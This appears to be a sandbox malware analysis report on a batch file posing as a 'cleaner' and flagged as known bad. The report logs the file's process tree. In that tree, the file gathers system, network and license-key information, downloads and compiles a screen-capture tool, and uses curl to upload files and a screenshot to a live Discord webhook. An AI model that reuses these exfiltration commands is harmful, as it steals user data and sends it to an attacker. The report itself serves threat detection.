Analysis Overview
SHA256
4361ee39760d6451345a135dbb6845f2f17ddab9b1eb6c141c6cd37745b160c4
Threat Level: Known bad
The file SchooiCleaner_1.0___.bat was found to be: Known bad.
Malicious Activity Summary
HawkEye
Blocklisted process makes network request
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Gathers system information
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Gathers network information
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-07-14 13:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-14 13:17
Reported
2024-07-14 13:19
Platform
win11-20240709-en
Max time kernel
136s
Max time network
124s
Command Line
Signatures
HawkEye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\screenCapture.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SchooiCleaner_1.0___.bat"
C:\Windows\system32\mode.com
mode con cols=80 lines=30
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\chcp.com
chcp 437
C:\Windows\system32\timeout.exe
timeout /t 5 /NOBREAK
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ping -4 -n 1 EHECWUZY | findstr [
C:\Windows\system32\PING.EXE
ping -4 -n 1 EHECWUZY
C:\Windows\system32\findstr.exe
findstr [
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-RestMethod api.ipify.org
C:\Windows\system32\timeout.exe
timeout /t 5 /NOBREAK
C:\Windows\system32\ipconfig.exe
ipconfig
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\Wbem\WMIC.exe
wmic path softwarelicensingservice get OA3xOriginalProductKey
C:\Windows\system32\timeout.exe
timeout /t 5 /NOBREAK
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "irm -useb https://raw.githubusercontent.com/npocmaka/batch.scripts/master/hybrids/.net/c/screenCapture.bat"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /out:"screenCapture.exe" "C:\Users\Admin\AppData\Local\Temp\SCREEN~1.BAT"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79CF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCA8B082AB58D4426B75C42DD92DCEA25.TMP"
C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
screenCapture.exe screenshot.png
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"~=CONNECTION ESTABLISHED=~ \nDate: Sun 07/14/2024 \nTime: 13:17:36.46 \nUsername: Admin \nComputer Name: EHECWUZY \nPublic IP: 194.110.13.70 \nPrivate IP: 10.127.0.146 \nInfo and Screenshot:\"}" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "file1=@Microsoft Edge.lnk" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| N/A | 127.0.0.1:49846 | tcp | |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/1068-0-0x00007FF883D23000-0x00007FF883D25000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5wo5z4y.ip3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1068-10-0x000001FD7F510000-0x000001FD7F532000-memory.dmp
memory/1068-9-0x00007FF883D20000-0x00007FF8847E2000-memory.dmp
memory/1068-11-0x00007FF883D20000-0x00007FF8847E2000-memory.dmp
memory/1068-12-0x000001FD7FB60000-0x000001FD7FD22000-memory.dmp
memory/1068-15-0x00007FF883D20000-0x00007FF8847E2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | c314cc5917d5a78a4e88f66d7114878c |
| SHA1 | f4b714a9e5ac21fd60022a65818557e5ed192cf5 |
| SHA256 | eb8e99e59a78efe2b90663fdfca03f6664fed69cfa7a807e88047ffc6d674c31 |
| SHA512 | c02db5c81d2a55ef6b960b7b60b8bc7ad57ae250c1fe8709c40cab7acdcbfcf1fc0675682ea01ffe85cbd4146f67e1c90132d75e014d30403683e856615a4058 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ad60aefe903d80a798b904be4a3f0283 |
| SHA1 | 5a27227a9aec298c043d9fe4162cc64664c01a25 |
| SHA256 | 17c944d3e6e2a0dd06c58ae9cefe305fa7da552c010c012625abcc9585eeb214 |
| SHA512 | 5a9ed746dd825929a2fa1a00b983563538be92a6b85df3728177e3a026babf659c0afadbf544c27aeae9b492b62ac9319af50eeeae610b0aee5256966d96470a |
C:\Users\Admin\AppData\Local\Temp\screenCapture.bat
| MD5 | 7c39bedd33b129b84117cb4e188eb9b6 |
| SHA1 | 43e660c225a60a8327c7ce73ab6abaddcd412122 |
| SHA256 | 2490bf909afee37ddc6dca73d51950c648b815b8d5a1fd853ad9f69413f4a711 |
| SHA512 | de368b8161612f7998f98b15a36028068b08052fceb2468855005cdc5ae6e44bebc8e6d3f0b6d340cd6308597863c003a353fe95eedd6a0a5bb4320e36ba7490 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCCA8B082AB58D4426B75C42DD92DCEA25.TMP
| MD5 | b4aaae3b532554d0c7bd317d4834ab16 |
| SHA1 | 28c854e399a3993ffd0df37b4385e29b4fe12905 |
| SHA256 | d7b2270159728b32e1ed60b03900ab7c9cb3c27df8f2456eae6824ad12f00f62 |
| SHA512 | ac6d36c61b057a0196cda5e249c5184a983bbf490ff1b54a6f263417e10c071addcb8437c840592e31637905e1fee10912e5932f9982e2abedc68cbb4a5e96a8 |
C:\Users\Admin\AppData\Local\Temp\RES79CF.tmp
| MD5 | 0f133e69c8530b8ae98ec4adb4e9b1d0 |
| SHA1 | 065c0f3aec8b2d506d0f2baa03e6e6868118b0c5 |
| SHA256 | 0868235947268f367cb807d65816e4f1596f855cc435b84f99938a4ebafb857d |
| SHA512 | e4e7eddb107b92b4d3e7e748f3c26532cdfcbc5865ef19881afc496ec1d7e00755b2f7fa2a9d6c3d38a9a0a1ff2d6b5043219c4f78c57eef72a5140dcb410b8b |
C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
| MD5 | 4a68364176d5b85c0c42bd1dabdd399d |
| SHA1 | 6b693434b279f571a4e816c175ae12239c226e32 |
| SHA256 | b1437c0601bd59676a95865b8919728f954e22a602c11be285919ab471343762 |
| SHA512 | 9c7af471cdf60f7581e380ebafd37dfee2b0834289383b9de3e768707a447cd8bcb9f271e8a357143d9076ce85bab3fe40a2ccfb3c0f4e60f7660f32e6f57aac |
memory/5800-63-0x0000000000D60000-0x0000000000D68000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ipconfig.txt
| MD5 | dcdb73ae0926f69516bd5b5b9d2d1888 |
| SHA1 | fda0767da11c328981ccb9998af535a7929f0a1f |
| SHA256 | aa743f1eaec4122e2b452997ebc80e7db7fa9583709bb64e3df9a7d15f1bea95 |
| SHA512 | d596a66800fb402a03d42a6b4bc13c9a402f929e761d39ab810ee836377e3c00658231ae730c5488af4f6a223f407d69ded6c484b61058c07cb1bc0625ca984b |
C:\Users\Admin\AppData\Local\Temp\sysinfo.txt
| MD5 | 57ed60900c36f66a54186df4150c80eb |
| SHA1 | e55ea3cb420ae7c6f59f5004e1ce7168efec4b9d |
| SHA256 | a6540f80fc8a3910299935b562b547015fb5fdb8809e604a26018759cbbd5413 |
| SHA512 | 85fd807a25a26430df9ca5512a94c78c576e6cdd35d6cc5ad981758d2afe9e0ff39109464f094cb6ef8158d0759fae3637fe75864b1c997797ce78423f7f27fc |
C:\Users\Admin\AppData\Local\Temp\screenshot.png
| MD5 | f82c9e40b7cae4ff5450ee68768df515 |
| SHA1 | 5c9a0d485be491e63cb11db7e55f675599f84ba6 |
| SHA256 | b451967373e438503dc1eab458bea08fc388c489ffb4c5d31e367f7d6e72f8aa |
| SHA512 | dfd7602f17bf71a190fc058b14f160cb204c951285ba5e1d1da777c71b30d5df6a122366a615a7cde1186f9e2f065b6a95f0fc2ebdc88c30d16ea39f7695e79d |
C:\Users\Admin\AppData\Local\Temp\dir.txt
| MD5 | 851ffc982e513bf50a75b4f81edf582d |
| SHA1 | 3918d31b5136eb012c1c7edb975b0f91a9abbad6 |
| SHA256 | dfdf810615ce2e8f00b24f1ef983789022478969eea1369733692c4fc0180eb4 |
| SHA512 | fb3ef5582b7a70d85dc122d29dff2e98719f1fc42dbd913d5f3479df447034ba5b72ba74d9013e9c32da6ce50517888b3a6fe3f7ce9f02f73c96bfa2ad3d93b4 |
C:\Users\Admin\AppData\Local\Temp\liscense.txt
| MD5 | b77c85675375ed548a4c019ae9ad5eda |
| SHA1 | f1f6559245707e38403b72c57f201784f1086f7d |
| SHA256 | 81a02546f3d9da106053d1800ba1a0c00815a8903661b5c1c086a5c88aedd1f9 |
| SHA512 | 3d6cdefda811dcaaff88f54117f03bfff04a04ba03efdf45167a7c4712bab3334974b404421d5bd1e3ad7eb65b0c390ddf472f9d256bd0cd8786e87ab8571bef |